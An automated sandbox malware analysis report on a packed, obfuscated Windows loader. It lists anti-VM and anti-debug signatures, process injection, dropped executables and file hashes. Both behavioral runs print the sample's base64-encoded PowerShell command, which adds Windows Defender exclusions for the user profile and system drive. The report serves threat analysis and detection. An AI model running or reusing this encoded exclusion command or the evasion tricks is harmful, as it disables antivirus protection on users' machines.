Malware Analysis Report

2025-05-28 16:27

Sample ID 230715-2hkvjacg9z
Target Loader_.exe
SHA256 b76df2a2fde219ca92c9a881fb7909392f65cea18e63f6402d991da8db4eabec
Tags
themida agilenet evasion trojan
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

b76df2a2fde219ca92c9a881fb7909392f65cea18e63f6402d991da8db4eabec

Threat Level: Likely malicious

The file Loader_.exe was found to be: Likely malicious.

Malicious Activity Summary

themida agilenet evasion trojan

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Checks computer location settings

Themida packer

Checks BIOS information in registry

Executes dropped EXE

Obfuscated with Agile.Net obfuscator

Loads dropped DLL

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-15 22:35

Signatures

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-15 22:34

Reported

2023-07-15 22:36

Platform

win7-20230712-en

Max time kernel

32s

Max time network

22s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Loader_.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A
N/A N/A C:\Users\Admin\compiled.exe N/A
N/A N/A C:\Users\Admin\compiled.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2244 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2244 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Users\Admin\compiled.exe
PID 2244 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Users\Admin\compiled.exe
PID 2244 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Users\Admin\compiled.exe
PID 2244 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe C:\Users\Admin\compiled.exe
PID 2832 wrote to memory of 2684 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe
PID 2832 wrote to memory of 2684 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe
PID 2832 wrote to memory of 2684 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe
PID 2832 wrote to memory of 2684 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe
PID 2832 wrote to memory of 1160 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe
PID 2832 wrote to memory of 1160 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe
PID 2832 wrote to memory of 1160 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe
PID 2832 wrote to memory of 1160 N/A C:\Users\Admin\compiled.exe C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Loader_.exe

"C:\Users\Admin\AppData\Local\Temp\Loader_.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAYwBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAeQBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAdwB6ACMAPgA="

C:\Users\Admin\compiled.exe

"C:\Users\Admin\compiled.exe"

C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe

"C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe" -unpacking

C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe

"C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe"

Network

N/A

Files

memory/2244-54-0x0000000000400000-0x0000000002772000-memory.dmp

memory/2244-55-0x00000000778A0000-0x00000000778A2000-memory.dmp

memory/2244-56-0x0000000000400000-0x0000000002772000-memory.dmp

\Users\Admin\compiled.exe

MD5 b763ec0b17dcf0adc1416a900c4551ac
SHA1 7216be700ac4a361aee8c43823c59b018c2ef6c3
SHA256 e30044b9f89eff356277d505a71b007a5a16a2d8b7db7505d46398fb2beef00a
SHA512 386be6e0f9268e8723415b27af2d088fec37bf13519d974d97a2367d0e2a1dc22fb0853a788f02ebc931b322cb1a28333fea91759cc0ea35144d3d94e2e91a75

C:\Users\Admin\compiled.exe

MD5 b763ec0b17dcf0adc1416a900c4551ac
SHA1 7216be700ac4a361aee8c43823c59b018c2ef6c3
SHA256 e30044b9f89eff356277d505a71b007a5a16a2d8b7db7505d46398fb2beef00a
SHA512 386be6e0f9268e8723415b27af2d088fec37bf13519d974d97a2367d0e2a1dc22fb0853a788f02ebc931b322cb1a28333fea91759cc0ea35144d3d94e2e91a75

C:\Users\Admin\compiled.exe

MD5 b763ec0b17dcf0adc1416a900c4551ac
SHA1 7216be700ac4a361aee8c43823c59b018c2ef6c3
SHA256 e30044b9f89eff356277d505a71b007a5a16a2d8b7db7505d46398fb2beef00a
SHA512 386be6e0f9268e8723415b27af2d088fec37bf13519d974d97a2367d0e2a1dc22fb0853a788f02ebc931b322cb1a28333fea91759cc0ea35144d3d94e2e91a75

memory/2244-64-0x0000000000400000-0x0000000002772000-memory.dmp

memory/2832-67-0x0000000000360000-0x00000000003AA000-memory.dmp

memory/2832-68-0x0000000000300000-0x0000000000324000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe

MD5 ed001288c24f331c9733acf3ca3520b0
SHA1 1e935afba79825470c54afaec238402d068ddefa
SHA256 6c20ba0c24e2cf169fd9b0623e4a1abe3718824ff48085250dae8c019cc6cb06
SHA512 e6ba29aa9a8c61e8fd2823cf96343fa7c3c41e8f698a6be428b13923ed3f103ea7a7d613b8808a6447f37e54516b49f61976391a551ec4fa184cc7abe38b2444

memory/2832-150-0x00000000735B0000-0x0000000073C9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe

MD5 ed001288c24f331c9733acf3ca3520b0
SHA1 1e935afba79825470c54afaec238402d068ddefa
SHA256 6c20ba0c24e2cf169fd9b0623e4a1abe3718824ff48085250dae8c019cc6cb06
SHA512 e6ba29aa9a8c61e8fd2823cf96343fa7c3c41e8f698a6be428b13923ed3f103ea7a7d613b8808a6447f37e54516b49f61976391a551ec4fa184cc7abe38b2444

\Users\Admin\AppData\Local\Temp\f6181fdb-14dd-4314-882f-0177b863f35f\ProgressBarSplash.exe

MD5 ed001288c24f331c9733acf3ca3520b0
SHA1 1e935afba79825470c54afaec238402d068ddefa
SHA256 6c20ba0c24e2cf169fd9b0623e4a1abe3718824ff48085250dae8c019cc6cb06
SHA512 e6ba29aa9a8c61e8fd2823cf96343fa7c3c41e8f698a6be428b13923ed3f103ea7a7d613b8808a6447f37e54516b49f61976391a551ec4fa184cc7abe38b2444

memory/2684-151-0x0000000000F10000-0x0000000000F2C000-memory.dmp

memory/2436-152-0x00000000740D0000-0x000000007467B000-memory.dmp

memory/2436-153-0x00000000022E0000-0x0000000002320000-memory.dmp

memory/2832-154-0x0000000004B50000-0x0000000004B90000-memory.dmp

memory/2436-155-0x00000000022E0000-0x0000000002320000-memory.dmp

memory/2436-156-0x00000000022E0000-0x0000000002320000-memory.dmp

memory/2436-157-0x00000000740D0000-0x000000007467B000-memory.dmp

memory/2684-158-0x00000000735B0000-0x0000000073C9E000-memory.dmp

memory/2684-159-0x0000000004890000-0x00000000048D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe

MD5 4b07d4daa90e051ca065e497c8d21346
SHA1 248cce5809f7dbde17402ecb36bced1b071f9972
SHA256 70795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA512 0c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545

memory/2684-184-0x00000000735B0000-0x0000000073C9E000-memory.dmp

\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe

MD5 4b07d4daa90e051ca065e497c8d21346
SHA1 248cce5809f7dbde17402ecb36bced1b071f9972
SHA256 70795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA512 0c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545

\Users\Admin\AppData\Local\Temp\compiled_e4429c33-45d6-4f61-bb4f-789666ada262\OMM Loader.exe

MD5 4b07d4daa90e051ca065e497c8d21346
SHA1 248cce5809f7dbde17402ecb36bced1b071f9972
SHA256 70795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA512 0c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545

memory/2436-186-0x00000000740D0000-0x000000007467B000-memory.dmp

memory/2832-187-0x00000000735B0000-0x0000000073C9E000-memory.dmp

memory/2832-283-0x00000000735B0000-0x0000000073C9E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-15 22:34

Reported

2023-07-15 22:36

Platform

win10v2004-20230703-en

Max time kernel

40s

Max time network

37s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Loader_.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Loader_.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Loader_.exe

"C:\Users\Admin\AppData\Local\Temp\Loader_.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAYwBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAeQBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAdwB6ACMAPgA="

C:\Users\Admin\compiled.exe

"C:\Users\Admin\compiled.exe"

C:\Users\Admin\AppData\Local\Temp\compiled_40deecec-88bd-4a31-9e32-aec385e55c81\OMM Loader.exe

"C:\Users\Admin\AppData\Local\Temp\compiled_40deecec-88bd-4a31-9e32-aec385e55c81\OMM Loader.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 254.143.241.8.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 assets.msn.com udp
NL 2.19.195.219:443 assets.msn.com tcp
US 8.8.8.8:53 219.195.19.2.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp

Files

memory/4572-133-0x0000000000400000-0x0000000002772000-memory.dmp

memory/4572-134-0x0000000077D44000-0x0000000077D46000-memory.dmp

memory/4572-135-0x0000000000400000-0x0000000002772000-memory.dmp

memory/3480-136-0x0000000002630000-0x0000000002666000-memory.dmp

memory/3480-137-0x0000000073F50000-0x0000000074700000-memory.dmp

memory/3480-140-0x0000000002700000-0x0000000002710000-memory.dmp

memory/3480-141-0x0000000004D90000-0x00000000053B8000-memory.dmp

memory/3480-138-0x0000000002700000-0x0000000002710000-memory.dmp

C:\Users\Admin\compiled.exe

MD5 b763ec0b17dcf0adc1416a900c4551ac
SHA1 7216be700ac4a361aee8c43823c59b018c2ef6c3
SHA256 e30044b9f89eff356277d505a71b007a5a16a2d8b7db7505d46398fb2beef00a
SHA512 386be6e0f9268e8723415b27af2d088fec37bf13519d974d97a2367d0e2a1dc22fb0853a788f02ebc931b322cb1a28333fea91759cc0ea35144d3d94e2e91a75

memory/4572-167-0x0000000000400000-0x0000000002772000-memory.dmp

C:\Users\Admin\compiled.exe

MD5 b763ec0b17dcf0adc1416a900c4551ac
SHA1 7216be700ac4a361aee8c43823c59b018c2ef6c3
SHA256 e30044b9f89eff356277d505a71b007a5a16a2d8b7db7505d46398fb2beef00a
SHA512 386be6e0f9268e8723415b27af2d088fec37bf13519d974d97a2367d0e2a1dc22fb0853a788f02ebc931b322cb1a28333fea91759cc0ea35144d3d94e2e91a75

C:\Users\Admin\compiled.exe

MD5 b763ec0b17dcf0adc1416a900c4551ac
SHA1 7216be700ac4a361aee8c43823c59b018c2ef6c3
SHA256 e30044b9f89eff356277d505a71b007a5a16a2d8b7db7505d46398fb2beef00a
SHA512 386be6e0f9268e8723415b27af2d088fec37bf13519d974d97a2367d0e2a1dc22fb0853a788f02ebc931b322cb1a28333fea91759cc0ea35144d3d94e2e91a75

memory/3480-170-0x0000000004D50000-0x0000000004D72000-memory.dmp

memory/3712-174-0x0000000000890000-0x00000000008DA000-memory.dmp

memory/3480-180-0x0000000005530000-0x0000000005596000-memory.dmp

memory/3712-186-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/4572-172-0x0000000000400000-0x0000000002772000-memory.dmp

memory/3480-185-0x0000000005710000-0x0000000005776000-memory.dmp

memory/3712-187-0x00000000057B0000-0x0000000005D54000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dptq0vn2.aza.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3712-173-0x0000000073F50000-0x0000000074700000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\compiled_40deecec-88bd-4a31-9e32-aec385e55c81\OMM Loader.exe

MD5 4b07d4daa90e051ca065e497c8d21346
SHA1 248cce5809f7dbde17402ecb36bced1b071f9972
SHA256 70795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA512 0c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545

C:\Users\Admin\AppData\Local\Temp\compiled_40deecec-88bd-4a31-9e32-aec385e55c81\OMM Loader.exe

MD5 4b07d4daa90e051ca065e497c8d21346
SHA1 248cce5809f7dbde17402ecb36bced1b071f9972
SHA256 70795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA512 0c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545

memory/3480-287-0x0000000005C30000-0x0000000005C4E000-memory.dmp

memory/3480-288-0x0000000002700000-0x0000000002710000-memory.dmp

memory/3480-289-0x0000000006200000-0x0000000006232000-memory.dmp

memory/3480-290-0x00000000753D0000-0x000000007541C000-memory.dmp

memory/3480-300-0x00000000061E0000-0x00000000061FE000-memory.dmp

memory/3480-301-0x0000000007580000-0x0000000007BFA000-memory.dmp

memory/3480-302-0x0000000006F40000-0x0000000006F5A000-memory.dmp

memory/3480-303-0x0000000006FB0000-0x0000000006FBA000-memory.dmp

memory/3480-304-0x00000000071D0000-0x0000000007266000-memory.dmp

memory/3480-305-0x0000000073F50000-0x0000000074700000-memory.dmp

memory/3480-306-0x0000000007180000-0x000000000718E000-memory.dmp

memory/3480-307-0x0000000002700000-0x0000000002710000-memory.dmp

memory/3480-308-0x0000000007270000-0x000000000728A000-memory.dmp

memory/3480-309-0x00000000071C0000-0x00000000071C8000-memory.dmp

memory/3480-310-0x0000000002700000-0x0000000002710000-memory.dmp

memory/3480-313-0x0000000073F50000-0x0000000074700000-memory.dmp

memory/3712-314-0x0000000073F50000-0x0000000074700000-memory.dmp

memory/3712-315-0x00000000051F0000-0x0000000005200000-memory.dmp

memory/3712-412-0x0000000073F50000-0x0000000074700000-memory.dmp